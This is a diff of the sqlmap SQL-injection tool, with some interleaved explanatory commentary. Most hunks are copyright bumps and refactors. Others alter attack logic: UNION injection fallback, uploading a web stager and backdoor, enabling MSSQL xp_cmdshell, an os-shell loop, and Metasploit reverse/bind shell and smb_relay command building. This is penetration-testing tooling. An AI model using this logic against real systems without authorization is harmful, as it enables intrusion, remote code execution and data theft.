+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

@@ -38,6 +38,7 @@ from lib.core.enums import CHARSET_TYPE
from lib.core.enums import DBMS
from lib.core.enums import EXPECTED
from lib.core.enums import PAYLOAD
+from lib.core.exception import SqlmapConnectionException
from lib.core.exception import SqlmapNotVulnerableException
from lib.core.exception import SqlmapUserQuitException
from lib.core.settings import MAX_TECHNIQUES_PER_VALUE

@@ -371,11 +372,18 @@ def getValue(expression, blind=True, union=True, error=True, time=True, fromUser
            if union and isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION):
                kb.technique = PAYLOAD.TECHNIQUE.UNION
                kb.forcePartialUnion = kb.injection.data[PAYLOAD.TECHNIQUE.UNION].vector[8]
+                fallback = not expected and kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.ORIGINAL and not kb.forcePartialUnion
+
+                try:
                    value = _goUnion(forgeCaseExpression if expected == EXPECTED.BOOL else query, unpack, dump)
+                except SqlmapConnectionException:
+                    if not fallback:
+                        raise
+
                count += 1
                found = (value is not None) or (value is None and expectingNone) or count >= MAX_TECHNIQUES_PER_VALUE

-                if not found and not expected and kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.ORIGINAL and not kb.forcePartialUnion:
+                if not found and fallback:
                    warnMsg = "something went wrong with full UNION "
                    warnMsg += "technique (could be because of "
                    warnMsg += "limitation on retrieved number of entries)"

@@ -383,10 +391,12 @@ def getValue(expression, blind=True, union=True, error=True, time=True, fromUser
                        warnMsg += ". Falling back to partial UNION technique"
                        singleTimeWarnMessage(warnMsg)

+                        try:
                            pushValue(kb.forcePartialUnion)
                            kb.forcePartialUnion = True
                            value = _goUnion(query, unpack, dump)
                            found = (value is not None) or (value is None and expectingNone)
+                        finally:
                            kb.forcePartialUnion = popValue()
                    else:
                        singleTimeWarnMessage(warnMsg)

@@ -442,7 +452,7 @@ def getValue(expression, blind=True, union=True, error=True, time=True, fromUser

    kb.safeCharEncode = False

-    if not kb.testMode and value is None and Backend.getDbms() and conf.dbmsHandler and not conf.noCast and not conf.hexConvert:
+    if not any((kb.testMode, conf.dummy, conf.offline)) and value is None and Backend.getDbms() and conf.dbmsHandler and not conf.noCast and not conf.hexConvert:
        warnMsg = "in case of continuous data retrieval problems you are advised to try "
        warnMsg += "a switch '--no-cast' "
        warnMsg += "or switch '--hex'" if Backend.getIdentifiedDbms() not in (DBMS.ACCESS, DBMS.FIREBIRD) else ""

@@ -468,7 +478,7 @@ def goStacked(expression, silent=False):
    query = agent.prefixQuery(";%s" % expression)
    query = agent.suffixQuery(query)
    payload = agent.payload(newValue=query)
-    Request.queryPage(payload, content=False, silent=silent, noteResponseTime=False, timeBasedCompare=True)
+    Request.queryPage(payload, content=False, silent=silent, noteResponseTime=False, timeBasedCompare="SELECT" in (payload or "").upper())

def checkBooleanExpression(expression, expectingNone=True):
    return getValue(expression, expected=EXPECTED.BOOL, charsetType=CHARSET_TYPE.BINARY, suppressOutput=True, expectingNone=expectingNone)
@@ -1,17 +1,16 @@
#!/usr/bin/env python

"""
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

import urllib2


class MethodRequest(urllib2.Request):
-    '''
+    """
    Used to create HEAD/PUT/DELETE/... requests with urllib2
-    '''
+    """

    def set_method(self, method):
        self.method = method.upper()
@@ -1,7 +1,7 @@
#!/usr/bin/env python

"""
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

@@ -1,7 +1,7 @@
#!/usr/bin/env python

"""
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

@@ -1,10 +1,11 @@
#!/usr/bin/env python

"""
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

+import types
import urllib2
import urlparse

@@ -122,6 +123,27 @@ class SmartRedirectHandler(urllib2.HTTPRedirectHandler):
                req.headers[HTTP_HEADER.COOKIE] = headers[HTTP_HEADER.SET_COOKIE].split(conf.cookieDel or DEFAULT_COOKIE_DELIMITER)[0]
            try:
                result = urllib2.HTTPRedirectHandler.http_error_302(self, req, fp, code, msg, headers)
+            except urllib2.HTTPError, e:
+                result = e
+
+                # Dirty hack for http://bugs.python.org/issue15701
+                try:
+                    result.info()
+                except AttributeError:
+                    def _(self):
+                        return getattr(self, "hdrs") or {}
+                    result.info = types.MethodType(_, result)
+
+                if not hasattr(result, "read"):
+                    def _(self, length=None):
+                        return e.msg
+                    result.read = types.MethodType(_, result)
+
+                if not getattr(result, "url", None):
+                    result.url = redurl
+
+                if not getattr(result, "code", None):
+                    result.code = 999
            except:
                redurl = None
                result = fp
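
The workaround above for http://bugs.python.org/issue15701 patches read() and info() onto the urllib2.HTTPError instance by binding plain functions with types.MethodType, so the error object can then be consumed like a normal response. The mechanism in isolation (illustrative stand-in class, not the handler itself):

    import types

    class Response(object):
        # stand-in object, only for illustration
        msg = "Found"

    result = Response()

    if not hasattr(result, "read"):
        def _(self, length=None):
            return self.msg
        # bind the plain function to this one instance, the same way the handler does
        result.read = types.MethodType(_, result)

    assert result.read() == "Found"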
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
|
@ -1,19 +1,24 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
import sys
|
||||||
|
|
||||||
from extra.safe2bin.safe2bin import safechardecode
|
from extra.safe2bin.safe2bin import safechardecode
|
||||||
from lib.core.common import dataToStdout
|
from lib.core.common import dataToStdout
|
||||||
from lib.core.common import Backend
|
from lib.core.common import Backend
|
||||||
from lib.core.common import getSQLSnippet
|
from lib.core.common import getSQLSnippet
|
||||||
|
from lib.core.common import getUnicode
|
||||||
from lib.core.common import isStackingAvailable
|
from lib.core.common import isStackingAvailable
|
||||||
from lib.core.common import readInput
|
from lib.core.common import readInput
|
||||||
from lib.core.data import conf
|
from lib.core.data import conf
|
||||||
from lib.core.data import logger
|
from lib.core.data import logger
|
||||||
|
from lib.core.enums import AUTOCOMPLETE_TYPE
|
||||||
from lib.core.enums import DBMS
|
from lib.core.enums import DBMS
|
||||||
|
from lib.core.enums import OS
|
||||||
from lib.core.exception import SqlmapFilePathException
|
from lib.core.exception import SqlmapFilePathException
|
||||||
from lib.core.exception import SqlmapUnsupportedFeatureException
|
from lib.core.exception import SqlmapUnsupportedFeatureException
|
||||||
from lib.core.shell import autoCompletion
|
from lib.core.shell import autoCompletion
|
||||||
|
@@ -116,13 +121,14 @@ class Abstraction(Web, UDF, Xp_cmdshell):
            infoMsg += "'x' or 'q' and press ENTER"
            logger.info(infoMsg)

-        autoCompletion(osShell=True)
+        autoCompletion(AUTOCOMPLETE_TYPE.OS, OS.WINDOWS if Backend.isOs(OS.WINDOWS) else OS.LINUX)

        while True:
            command = None

            try:
                command = raw_input("os-shell> ")
+                command = getUnicode(command, encoding=sys.stdin.encoding)
            except KeyboardInterrupt:
                print
                errMsg = "user aborted"
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
@@ -24,6 +24,7 @@ from lib.core.common import randomRange
from lib.core.common import randomStr
from lib.core.common import readInput
from lib.core.data import conf
+from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import paths
from lib.core.enums import DBMS
|
@@ -61,8 +62,10 @@ class Metasploit:
        self.localIP = getLocalIP()
        self.remoteIP = getRemoteIP() or conf.hostname
        self._msfCli = normalizePath(os.path.join(conf.msfPath, "msfcli"))
+        self._msfConsole = normalizePath(os.path.join(conf.msfPath, "msfconsole"))
        self._msfEncode = normalizePath(os.path.join(conf.msfPath, "msfencode"))
        self._msfPayload = normalizePath(os.path.join(conf.msfPath, "msfpayload"))
+        self._msfVenom = normalizePath(os.path.join(conf.msfPath, "msfvenom"))

        if IS_WIN:
            _ = conf.msfPath

@@ -76,8 +79,10 @@ class Metasploit:
                if _ == old:
                    break
            self._msfCli = "%s & ruby %s" % (_, self._msfCli)
+            self._msfConsole = "%s & ruby %s" % (_, self._msfConsole)
            self._msfEncode = "ruby %s" % self._msfEncode
            self._msfPayload = "%s & ruby %s" % (_, self._msfPayload)
+            self._msfVenom = "%s & ruby %s" % (_, self._msfVenom)

        self._msfPayloadsList = {
            "windows": {

@@ -326,6 +331,7 @@ class Metasploit:
        self.payloadConnStr = "%s/%s" % (self.payloadStr, self.connectionStr)

    def _forgeMsfCliCmd(self, exitfunc="process"):
+        if kb.oldMsf:
            self._cliCmd = "%s multi/handler PAYLOAD=%s" % (self._msfCli, self.payloadConnStr)
            self._cliCmd += " EXITFUNC=%s" % exitfunc
            self._cliCmd += " LPORT=%s" % self.portStr
|
@@ -341,10 +347,27 @@ class Metasploit:
                self._cliCmd += " DisableCourtesyShell=true"

            self._cliCmd += " E"
+        else:
+            self._cliCmd = "%s -x 'use multi/handler; set PAYLOAD %s" % (self._msfConsole, self.payloadConnStr)
+            self._cliCmd += "; set EXITFUNC %s" % exitfunc
+            self._cliCmd += "; set LPORT %s" % self.portStr
+
+            if self.connectionStr.startswith("bind"):
+                self._cliCmd += "; set RHOST %s" % self.rhostStr
+            elif self.connectionStr.startswith("reverse"):
+                self._cliCmd += "; set LHOST %s" % self.lhostStr
+            else:
+                raise SqlmapDataException("unexpected connection type")
+
+            if Backend.isOs(OS.WINDOWS) and self.payloadStr == "windows/vncinject":
+                self._cliCmd += "; set DisableCourtesyShell true"
+
+            self._cliCmd += "; exploit'"

    def _forgeMsfCliCmdForSmbrelay(self):
        self._prepareIngredients(encode=False)

+        if kb.oldMsf:
            self._cliCmd = "%s windows/smb/smb_relay PAYLOAD=%s" % (self._msfCli, self.payloadConnStr)
            self._cliCmd += " EXITFUNC=thread"
            self._cliCmd += " LPORT=%s" % self.portStr
|
@@ -359,9 +382,29 @@ class Metasploit:
                raise SqlmapDataException("unexpected connection type")

            self._cliCmd += " E"
+        else:
+            self._cliCmd = "%s -x 'use windows/smb/smb_relay; set PAYLOAD %s" % (self._msfConsole, self.payloadConnStr)
+            self._cliCmd += "; set EXITFUNC thread"
+            self._cliCmd += "; set LPORT %s" % self.portStr
+            self._cliCmd += "; set SRVHOST %s" % self.lhostStr
+            self._cliCmd += "; set SRVPORT %s" % self._selectSMBPort()
+
+            if self.connectionStr.startswith("bind"):
+                self._cliCmd += "; set RHOST %s" % self.rhostStr
+            elif self.connectionStr.startswith("reverse"):
+                self._cliCmd += "; set LHOST %s" % self.lhostStr
+            else:
+                raise SqlmapDataException("unexpected connection type")
+
+            self._cliCmd += "; exploit'"

    def _forgeMsfPayloadCmd(self, exitfunc, format, outFile, extra=None):
-        self._payloadCmd = "%s %s" % (self._msfPayload, self.payloadConnStr)
+        if kb.oldMsf:
+            self._payloadCmd = self._msfPayload
+        else:
+            self._payloadCmd = "%s -p" % self._msfVenom
+
+        self._payloadCmd += " %s" % self.payloadConnStr
        self._payloadCmd += " EXITFUNC=%s" % exitfunc
        self._payloadCmd += " LPORT=%s" % self.portStr

@@ -373,6 +416,7 @@ class Metasploit:
        if Backend.isOs(OS.LINUX) and conf.privEsc:
            self._payloadCmd += " PrependChrootBreak=true PrependSetuid=true"

+        if kb.oldMsf:
            if extra == "BufferRegister=EAX":
                self._payloadCmd += " R | %s -a x86 -e %s -o \"%s\" -t %s" % (self._msfEncode, self.encoderStr, outFile, format)

@@ -380,6 +424,14 @@ class Metasploit:
                self._payloadCmd += " %s" % extra
            else:
                self._payloadCmd += " X > \"%s\"" % outFile
+        else:
+            if extra == "BufferRegister=EAX":
+                self._payloadCmd += " -a x86 -e %s -f %s > \"%s\"" % (self.encoderStr, format, outFile)
+
+                if extra is not None:
+                    self._payloadCmd += " %s" % extra
+            else:
+                self._payloadCmd += " -f exe > \"%s\"" % outFile

    def _runMsfCliSmbrelay(self):
        self._forgeMsfCliCmdForSmbrelay()
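
The Metasploit changes above branch on kb.oldMsf: older framework installations keep the msfcli / msfpayload | msfencode toolchain, newer ones get msfconsole -x and msfvenom. As a rough idea of the two command shapes being assembled (illustrative values only; exact option names and payload paths depend on the local Metasploit version):

    # Illustrative values, not taken from a real run
    payload = "windows/meterpreter/reverse_tcp"
    lhost, lport = "192.168.1.10", "4444"
    encoder, out_file = "x86/shikata_ga_nai", "/tmp/payload.exe"

    # legacy toolchain: msfpayload piped into msfencode
    old_cmd = "msfpayload %s EXITFUNC=process LHOST=%s LPORT=%s R | msfencode -a x86 -e %s -o \"%s\" -t exe" % (payload, lhost, lport, encoder, out_file)

    # current toolchain: a single msfvenom invocation
    new_cmd = "msfvenom -p %s EXITFUNC=process LHOST=%s LPORT=%s -a x86 -e %s -f exe > \"%s\"" % (payload, lhost, lport, encoder, out_file)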
|
|
@@ -1,7 +1,7 @@
#!/usr/bin/env python

"""
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

@@ -1,13 +1,14 @@
#!/usr/bin/env python

"""
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

import os

from lib.core.agent import agent
+from lib.core.common import checkFile
from lib.core.common import dataToStdout
from lib.core.common import Backend
from lib.core.common import isStackingAvailable

@@ -146,6 +147,7 @@ class UDF:

        if len(self.udfToCreate) > 0:
            self.udfSetRemotePath()
+            checkFile(self.udfLocalFile)
            written = self.writeFile(self.udfLocalFile, self.udfRemoteFile, "binary", forceCheck=True)

            if written is not True:

@@ -359,6 +361,9 @@ class UDF:
                warnMsg += "<= %d are allowed" % len(udfList)
                logger.warn(warnMsg)

+            if not isinstance(choice, int):
+                break
+
        cmd = ""
        count = 1
        udfToCall = udfList[choice - 1]
|
@@ -1,14 +1,15 @@
#!/usr/bin/env python

"""
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

-import urlparse
import os
+import posixpath
import re
import StringIO
+import urlparse

from tempfile import mkstemp

|
@ -130,7 +131,7 @@ class Web:
|
||||||
return False
|
return False
|
||||||
|
|
||||||
def _webFileInject(self, fileContent, fileName, directory):
|
def _webFileInject(self, fileContent, fileName, directory):
|
||||||
outFile = ntToPosixSlashes(os.path.join(directory, fileName))
|
outFile = posixpath.join(ntToPosixSlashes(directory), fileName)
|
||||||
uplQuery = getUnicode(fileContent).replace("WRITABLE_DIR", directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory)
|
uplQuery = getUnicode(fileContent).replace("WRITABLE_DIR", directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory)
|
||||||
query = ""
|
query = ""
|
||||||
|
|
||||||
|
@ -203,15 +204,15 @@ class Web:
|
||||||
backdoorName = "tmpb%s.%s" % (randomStr(lowercase=True), self.webApi)
|
backdoorName = "tmpb%s.%s" % (randomStr(lowercase=True), self.webApi)
|
||||||
backdoorContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "backdoor.%s_" % self.webApi))
|
backdoorContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "backdoor.%s_" % self.webApi))
|
||||||
|
|
||||||
stagerName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webApi)
|
|
||||||
stagerContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stager.%s_" % self.webApi))
|
stagerContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stager.%s_" % self.webApi))
|
||||||
success = False
|
success = False
|
||||||
|
|
||||||
for directory in directories:
|
for directory in directories:
|
||||||
self.webStagerFilePath = ntToPosixSlashes(os.path.join(directory, stagerName))
|
if not directory:
|
||||||
|
continue
|
||||||
|
|
||||||
if success:
|
stagerName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webApi)
|
||||||
break
|
self.webStagerFilePath = posixpath.join(ntToPosixSlashes(directory), stagerName)
|
||||||
|
|
||||||
uploaded = False
|
uploaded = False
|
||||||
directory = ntToPosixSlashes(normalizePath(directory))
|
directory = ntToPosixSlashes(normalizePath(directory))
|
||||||
|
@@ -221,6 +222,9 @@ class Web:
             else:
                 directory = directory[2:] if isWindowsDriveLetterPath(directory) else directory

+            if not directory.endswith('/'):
+                directory += '/'
+
             # Upload the file stager with the LIMIT 0, 1 INTO DUMPFILE method
             infoMsg = "trying to upload the file stager on '%s' " % directory
             infoMsg += "via LIMIT 'LINES TERMINATED BY' method"

@@ -251,13 +255,16 @@ class Web:
                 infoMsg += "via UNION method"
                 logger.info(infoMsg)

+                stagerName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webApi)
+                self.webStagerFilePath = posixpath.join(ntToPosixSlashes(directory), stagerName)
+
                 handle, filename = mkstemp()
                 os.fdopen(handle).close() # close low level handle (causing problems later)

                 with open(filename, "w+") as f:
                     _ = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stager.%s_" % self.webApi))
-                    _ = _.replace("WRITABLE_DIR", directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory)
-                    f.write(utf8encode(_))
+                    _ = _.replace("WRITABLE_DIR", utf8encode(directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory))
+                    f.write(_)

                 self.unionWriteFile(filename, self.webStagerFilePath, "text", forceCheck=True)

@@ -275,18 +282,7 @@ class Web:
                         uploaded = True
                         break

-            # Extra check - required
             if not uploaded:
-                self.webBaseUrl = "%s://%s:%d/" % (conf.scheme, conf.hostname, conf.port)
-                self.webStagerUrl = urlparse.urljoin(self.webBaseUrl, stagerName)
-
-                debugMsg = "trying to see if the file is accessible from '%s'" % self.webStagerUrl
-                logger.debug(debugMsg)
-
-                uplPage, _, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False)
-                uplPage = uplPage or ""
-
-                if "sqlmap file uploader" not in uplPage:
-                    continue
+                continue

             if "<%" in uplPage or "<?" in uplPage:

@@ -340,10 +336,10 @@ class Web:
                 else:
                     continue

-            self.webBackdoorUrl = ntToPosixSlashes(os.path.join(self.webBaseUrl, backdoorName))
+            self.webBackdoorUrl = posixpath.join(ntToPosixSlashes(self.webBaseUrl), backdoorName)
             self.webDirectory = directory

-            self.webBackdoorFilePath = ntToPosixSlashes(os.path.join(directory, backdoorName))
+            self.webBackdoorFilePath = posixpath.join(ntToPosixSlashes(directory), backdoorName)

             testStr = "command execution test"
             output = self.webBackdoorRunCmd("echo %s" % testStr)

@@ -1,12 +1,13 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """

 from lib.core.agent import agent
 from lib.core.common import Backend
+from lib.core.common import flattenValue
 from lib.core.common import getLimitRange
 from lib.core.common import getSQLSnippet
 from lib.core.common import hashDBWrite

@@ -51,10 +52,9 @@ class Xp_cmdshell:
             inject.goStacked(agent.runAsDBMSUser(cmd))

         self._randStr = randomStr(lowercase=True)
-        self._xpCmdshellNew = "xp_%s" % randomStr(lowercase=True)
-        self.xpCmdshellStr = "master..%s" % self._xpCmdshellNew
+        self.xpCmdshellStr = "master..new_xp_cmdshell"

-        cmd = getSQLSnippet(DBMS.MSSQL, "create_new_xp_cmdshell", RANDSTR=self._randStr, XP_CMDSHELL_NEW=self._xpCmdshellNew)
+        cmd = getSQLSnippet(DBMS.MSSQL, "create_new_xp_cmdshell", RANDSTR=self._randStr)

         if Backend.isVersionWithin(("2005", "2008")):
             cmd += ";RECONFIGURE WITH OVERRIDE"

@@ -142,13 +142,13 @@ class Xp_cmdshell:
             charCounter += len(echoedLine)

             if charCounter >= maxLen:
-                self.xpCmdshellExecCmd(cmd)
+                self.xpCmdshellExecCmd(cmd.rstrip(" & "))

                 cmd = ""
                 charCounter = 0

         if cmd:
-            self.xpCmdshellExecCmd(cmd)
+            self.xpCmdshellExecCmd(cmd.rstrip(" & "))

     def xpCmdshellForgeCmd(self, cmd, insertIntoTable=None):
         # When user provides DBMS credentials (with --dbms-cred) we need to

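The rstrip(" & ") added above trims the dangling Windows command separator that the chunking loop leaves at the end of the buffered command. In isolation, with made-up chunks:

    chunks = ["whoami", "ipconfig /all", "net user"]

    cmd = ""
    for chunk in chunks:
        cmd += "%s & " % chunk   # pieces are chained with the Windows separator " & "

    print(repr(cmd))                 # 'whoami & ipconfig /all & net user & '  (dangling separator)
    print(repr(cmd.rstrip(" & ")))   # 'whoami & ipconfig /all & net user'
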
@@ -226,12 +226,16 @@ class Xp_cmdshell:
         inject.goStacked("DELETE FROM %s" % self.cmdTblName)

         if output and isListLike(output) and len(output) > 1:
-            if not (output[0] or "").strip():
-                output = output[1:]
-            elif not (output[-1] or "").strip():
-                output = output[:-1]
+            _ = ""
+            lines = [line for line in flattenValue(output) if line is not None]

-            output = "\n".join(line for line in filter(None, output))
+            for i in xrange(len(lines)):
+                line = lines[i] or ""
+                if line is None or i in (0, len(lines) - 1) and not line.strip():
+                    continue
+                _ += "%s\n" % line
+
+            output = _.rstrip('\n')

         return output

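The new post-processing flattens the rows read back from the temporary results table and drops empty first and last rows before joining them. A standalone sketch; flattenValue() below is a simplified stand-in for the helper imported above, and the sample output is made up:

    def flattenValue(value):
        # simplified stand-in for sqlmap's flattenValue(): yield items from nested iterables
        for item in value:
            if isinstance(item, (list, tuple, set)):
                for sub in flattenValue(item):
                    yield sub
            else:
                yield item

    output = [("", "Volume in drive C has no label."), ("Directory of C:\\", None), ("",)]

    lines = [line for line in flattenValue(output) if line is not None]

    joined = ""
    for i in range(len(lines)):
        line = lines[i] or ""
        if i in (0, len(lines) - 1) and not line.strip():
            continue  # drop empty first/last rows only
        joined += "%s\n" % line

    print(joined.rstrip('\n'))
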
@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """

@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """

@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """

@@ -59,6 +59,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
     """

     abortedFlag = False
+    showEta = False
     partialValue = u""
     finalValue = None
     retrievedLength = 0

@@ -313,8 +314,8 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
                         errMsg = "invalid character detected. retrying.."
                         logger.error(errMsg)

+                        if kb.adjustTimeDelay is not ADJUST_TIME_DELAY.DISABLE:
                             conf.timeSec += 1

                             warnMsg = "increasing time delay to %d second%s " % (conf.timeSec, 's' if conf.timeSec > 1 else '')
                             logger.warn(warnMsg)

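The guard added in the last hunk only bumps the time delay when automatic delay adjustment has not been disabled. A standalone sketch; ADJUST_TIME_DELAY below is a stand-in for sqlmap's enumeration of the same name:

    class ADJUST_TIME_DELAY:
        # stand-in values; only the DISABLE sentinel matters for the check
        DISABLE = -1
        NO = 0
        YES = 1

    adjustTimeDelay = ADJUST_TIME_DELAY.YES
    timeSec = 5

    if adjustTimeDelay is not ADJUST_TIME_DELAY.DISABLE:
        timeSec += 1
        print("increasing time delay to %d second%s" % (timeSec, 's' if timeSec > 1 else ''))
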
@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """

@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """

@@ -116,7 +116,7 @@ def tableExists(tableFile, regex=None):

         if conf.verbose in (1, 2) and not hasattr(conf, "api"):
             clearConsoleLine(True)
-            infoMsg = "[%s] [INFO] retrieved: %s\r\n" % (time.strftime("%X"), unsafeSQLIdentificatorNaming(table))
+            infoMsg = "[%s] [INFO] retrieved: %s\n" % (time.strftime("%X"), unsafeSQLIdentificatorNaming(table))
             dataToStdout(infoMsg, True)

         if conf.verbose in (1, 2):

@@ -224,11 +224,11 @@ def columnExists(columnFile, regex=None):

         if conf.verbose in (1, 2) and not hasattr(conf, "api"):
             clearConsoleLine(True)
-            infoMsg = "[%s] [INFO] retrieved: %s\r\n" % (time.strftime("%X"), unsafeSQLIdentificatorNaming(column))
+            infoMsg = "[%s] [INFO] retrieved: %s\n" % (time.strftime("%X"), unsafeSQLIdentificatorNaming(column))
             dataToStdout(infoMsg, True)

         if conf.verbose in (1, 2):
-            status = '%d/%d items (%d%%)' % (threadData.shared.count, threadData.shared.limit, round(100.0 * threadData.shared.count / threadData.shared.limit))
+            status = "%d/%d items (%d%%)" % (threadData.shared.count, threadData.shared.limit, round(100.0 * threadData.shared.count / threadData.shared.limit))
             dataToStdout("\r[%s] [INFO] tried %s" % (time.strftime("%X"), status), True)

         kb.locks.io.release()

@@ -257,9 +257,9 @@ def columnExists(columnFile, regex=None):
             result = inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %s FROM %s WHERE ROUND(%s)=ROUND(%s))", (column, table, column, column)))

             if result:
-                columns[column] = 'numeric'
+                columns[column] = "numeric"
             else:
-                columns[column] = 'non-numeric'
+                columns[column] = "non-numeric"

     kb.data.cachedColumns[conf.db] = {conf.tbl: columns}

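The '\r\n' to '\n' change above fits how these progress messages are printed: the "tried ..." status line rewrites itself in place with a leading carriage return, so a finished "retrieved: ..." message only needs a plain newline. A standalone console sketch; the item names are made up:

    import sys
    import time

    items = ["users", "orders", "logs"]

    for count, item in enumerate(items, 1):
        status = "%d/%d items (%d%%)" % (count, len(items), round(100.0 * count / len(items)))
        sys.stdout.write("\r[%s] [INFO] tried %s" % (time.strftime("%X"), status))  # '\r' overwrites the line
        sys.stdout.flush()
        time.sleep(0.2)

    sys.stdout.write("\n[%s] [INFO] retrieved: %s\n" % (time.strftime("%X"), items[0]))
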
@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """

@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """

@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """

@@ -98,7 +98,7 @@ def dnsUse(payload, expression):
                     retVal = output

                     if kb.dnsTest is not None:
